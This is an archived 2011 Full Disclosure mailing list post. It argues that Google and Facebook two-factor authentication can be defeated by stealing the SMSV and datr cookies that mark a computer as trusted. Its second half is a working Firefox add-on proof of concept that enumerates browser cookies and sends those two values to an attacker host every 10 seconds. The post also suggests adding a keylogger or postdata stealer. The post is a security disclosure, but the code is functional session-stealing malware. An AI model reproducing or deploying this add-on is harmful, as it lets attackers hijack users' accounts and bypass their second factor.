Full Disclosure mailing list archives
(Google && Facebook) X factor authentication. Is X enough to sit back and relax?
From: "Z" <Z () wechall net>
Date: Sat, 21 May 2011 17:51:20 +0200
Google and Facebook have recently added 2 factor authentication to their services. Great news, so am I protected now? There are many type of attacks and attackers. Some forms of attacks are defeated by this 2 factor authentication (shoulder surfing, hardware keylogging, network MITM), other types of attacks defeat these 2 factor authentication protection, e.g. malwares, malicious browser extensions. Why are some attacks useless and why is malware still effective against these 2 factor authentications? Back to the basics: after logging in how can the server know that you are the authenticated user? There is only 1 thing what really matters: session cookies. I see, but who has access to my session cookies? Every program running in the same user context on the machine. This is the browser, browser addons, a malware running on the computer, an attacker having an interactive shell on your computer, etc. Is the session cookie stolable/clonable? Yes, it is a plain text file. Which cookies do I have to protect? On facebook, the datr cookie is responsible to "skip" the second factor on "known" computers. On gmail/google, the SMSV cookie is responsible to "skip" the second factor on "known" computers. Even if the attacker is from different country, using different browser, it does not matter. If the cookies are expired, first try to set the expirity date to the future, it's not tested if it will work. And what can the attacker do if he steals these cookies? The attacker can simply insert these cookies into his browser, and login with 1 factor defeated. What if someone is so paranoid that he always uses the 2 factor auth? The current session could be still stolen by the attacker. Otherwise one has to infect the mobile device, clone google authenticator or forward the sent sms-s to another mobile device (for proof search for Zitmo). Since google authenticator is a soft token, it is cloneable. Is it your idea to steal session cookies? No, but this field is kinda under-educated/under-valued. And how can the attacker steal the user password? Append a keystroke logger or a postdata stealer to this POC. There are examples here: www.jfgit.com But I'm using Linux/UNIX/BSD/Solaris/OSX/Win7, am I still vulnerable? Yes. But google and facebook are using httponly and secure flags on the cookies. Am I still vulnerable? Yes. Any recommendations? A "Restrict session to ip" option can help in the case if the attacker can't forward requests through the victim's computer. But basically, no, there is no help. Who are you? Z I don't believe this, prove it! Firefox POC addon will catch Google and Facebook password and steal the important cookies, and send the actual cookie value every 10 seconds to the attacker 127.0.0.1 ############################################################################ ############################# //Z host = 'http://127.0.0.1/'; interval = 10; gcookie = ""; fbcookie = ""; var event = { observe: function (subject, topic, data) { var cookieMgr = Components.classes["@mozilla.org/cookiemanager;1"].getService(Components.int erfaces.nsICookieManager); for (var e = cookieMgr.enumerator; e.hasMoreElements();) { var cookie = e.getNext().QueryInterface(Components.interfaces.nsICookie); cookie_str = "host:" + cookie.host + " name:" + cookie.name + " value:" + cookie.value + " expires:" + cookie.expires + " path:" + cookie.path + " isSecure:" + cookie.isSecure + " policy:" + cookie.policy + " isDomain:" + cookie.isDomain + " status:" + cookie.status + "\n"; if (cookie.name == "SMSV") { gcookie = cookie_str; } if (cookie.name == "datr") { fbcookie = cookie_str; } } http = new XMLHttpRequest(); http.open("GET", host + "?" + fbcookie + " " + gcookie, true); http.send(); gcookie = ""; fbcookie = ""; } } var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfa ces.nsITimer); const TYPE_REPEATING_PRECISE = Components.interfaces.nsITimer.TYPE_REPEATING_PRECISE; timer.init(event, interval * 1000, TYPE_REPEATING_PRECISE); ############################################################################ ############################# _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- (Google && Facebook) X factor authentication. Is X enough to sit back and relax? Z (May 21)